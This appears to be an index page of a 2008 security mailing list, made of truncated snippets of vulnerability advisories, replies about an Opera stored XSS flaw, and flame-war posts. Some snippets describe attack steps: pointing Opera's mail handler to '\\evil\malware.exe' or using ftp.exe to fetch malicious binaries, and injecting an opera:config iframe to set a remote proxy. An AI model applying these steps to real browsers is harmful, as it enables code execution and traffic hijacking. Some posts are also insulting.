have you forwarded this email to nytimes, wall street journal, blackhat
eu, jp, and usa, yet? We surely wouldn't want you to miss out on any press.
Dan Kaminsky wrote:
> Advisory: DNS TXT Record Parsing Bug in LibSPF2
> Author: Dan Kaminsky, Director of Penetration Testing, IOActive Inc,
> [EM
hello mr kamnski
what size hotpants
do yu wear?
this is a privacy implecaton
!
On Wed, 22 Oct 2008 06:14:51 +1100 Dan Kaminsky
<[EMAIL PROTECTED]> wrote:
>Advisory: DNS TXT Record Parsing Bug in LibSPF2
>Author: Dan Kaminsky, Director of Penetration Testing, IOActive
>Inc,
>[EMAIL PROTECTED
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
-
Debian Security Advisory DSA-1658-1 [EMAIL PROTECTED]
http://www.debian.org/security/ Thijs Kinkhorst
October 22, 2008
Hi,
Just found a way to use Stefano's opera:config idea to execute code from
remote.
Instead of changing the HTTP Proxy, an attacker can change the default
external mail application to "\\evil\malware.exe ", or to local commands
(e.g. ftp.exe which can be used to download malicious binaries fr
==
Secunia Research 22/10/2008
- HP OpenView Products Shared Trace Service Denial of Service -
==
Table of Contents
Affected Software
==
Secunia Research 22/10/2008
- Trend Micro OfficeScan CGI Parsing Buffer Overflows -
==
Table of Contents
Affected Software...
==
Secunia Research 22/10/2008
- GNU Enscript "setfilename" Special Escape Buffer Overflow -
==
Table of Contents
Affected Software..
FGA-2008-23:EMC NetWorker Denial of Service Vulnerability�
2008.October.21 �
�
Fortinet's FortiGuard Global Security Research Team Discovers Vulnerability in
EMC NetWorker �
�
Summary:�
�
A resource exhaustion vulnerability exists throughout multiple EMC products
through an exploited RPC i
Advisory: DNS TXT Record Parsing Bug in LibSPF2
Author: Dan Kaminsky, Director of Penetration Testing, IOActive Inc,
[EMAIL PROTECTED] (PGP Key In Appendix)
Abstract:
A relatively common bug parsing TXT records delivered over DNS, dating
at least back to 2002 in Sendmail 8.2.0 and almost certai
__
Insomnia Security Vulnerability Advisory: ISVA-081020.1
___
Name: Altiris Deployment Server Agent - Privilege Escalation
Released: 20 October 2008
Vendor Link
The DeepSec In Depth Security Conference is happy to announce the planned
schedule for this year's event from November 11th to 14th in Vienna, Austria.
The schedule (which can be found at https://deepsec.net/schedule) covers a
range of topics including botnet analysis, web application security, ma
Please find attached a detailed advisory of the vulnerability.
Alternatively, the advisory can also be found at:
http://www.trapkit.de/advisories/TKADV2008-010.txt
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Advisory: VLC media player TiVo ty Processing Stack Overflow
-- Forwarded message --
From: waveroad waveroad <[EMAIL PROTECTED]>
Date: 2008/10/22
Subject: Re: [Full-disclosure] ureleet
To: Sigma & Omicron & Beta <[EMAIL PROTECTED]>
Urleet & n3td3v why dont you fix your problems privatly ?
There' enought crap in this FD list, and there's no
-Original Message-
From: Stefano Di Paola [mailto:[EMAIL PROTECTED]
Sent: Thursday, 23 October 2008 5:41 a.m.
To: Roberto Suggi
Cc: kuza55; full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Opera Stored Cross Site Scripting Vulnerability
>Hi guys
>I'm not a real Opera expert
Please ignore him. His worst nightmare is that we setup a filter that
will delete any email containing n3td3v. we dont care about his
licence shit or his opinions. So i dont think we will lose any
information that matter. The poor guy is going to grow up in 1 or 2
years and he will finally leave th
==
= Security Objectives Advisory (SECOBJADV-2008-05) =
==
Veritas Storage Foundation Arbitrary File Read Vulnerability
http://www.security-obj
Hi guys
I'm not a real Opera expert, but since the scheme is opera: you could
change the configuration on the fly, for example to set a remote proxy
1. add in historysearch an iframe with src='opera:config'
2. add a script into the iframe which execute:
opera.setPreference("Proxy","HTTP Server","a
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Cisco Security Advisory: Multiple Vulnerabilities in Cisco PIX and
Cisco ASA
Advisory ID: cisco-sa-20081022-asa
http://www.cisco.com/warp/public/707/cisco-sa-20081022-asa.shtml
Revision 1.0
For Public Release 2008 October 22 1600 UTC (GMT
-Original Message-
From: kuza55 [mailto:[EMAIL PROTECTED]
Sent: Thursday, 23 October 2008 1:25 a.m.
To: Roberto Suggi
Cc: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Opera Stored Cross Site Scripting Vulnerability
>Is there any potential for code execution here similar
Why would n3td3v ban n3td3v from n3td3v? And why would the banning of n3td3v by
n3td3v from n3td3v make n3td3v mad?
> Date: Wed, 22 Oct 2008 04:29:13 +0100
> From: [EMAIL PROTECTED]
> To: full-disclosure@lists.grok.org.uk
> Subject: [Full-disclosure] ureleet
>
> you're just trying to ruin the r
n3td3v has no idea why n3td3v is posting highly off topic video links to FD.
Perhaps n3td3v needs to be trout slapped.
> Date: Wed, 22 Oct 2008 02:00:16 +0100
> From: [EMAIL PROTECTED]
> To: full-disclosure@lists.grok.org.uk
> Subject: Re: [Full-disclosure] marcus sachs
>
> he should come ont
Advisory for Oracle CPU October 2008 - APEX FLOWS excessive privileges
==
See http://www.petefinnigan.com/Advisory_CPU_Oct_2008.htm for details
Description
---
Oracle Appication Express (APEX) is a rapid development tool
Is there any potential for code execution here similar to XSS bugs in
Firefox's chrome:// context or in IE's Local Zone?
Also, you have a PoC which extracts document.cookie; which cookie does
this acquire? From my understanding of this advisory the xss is
rendered in opera:historysearch rather tha
==
=
= Opera Stored Cross Site Scripting Vulnerability
=
= Vendor Website:
= http://www.opera.com
=
= Affected Version:
= -- All desktop versions
=
= Public disclosure on 22nd October 2008
=
==
24 matches
Mail list logo
